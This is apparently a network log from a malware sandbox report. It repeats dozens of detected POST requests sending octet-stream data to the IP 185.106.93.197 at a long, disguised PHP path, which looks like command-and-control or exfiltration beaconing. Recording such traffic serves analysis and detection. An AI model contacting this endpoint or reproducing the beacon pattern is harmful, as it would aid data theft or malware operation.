Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1832Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1832Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1832Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
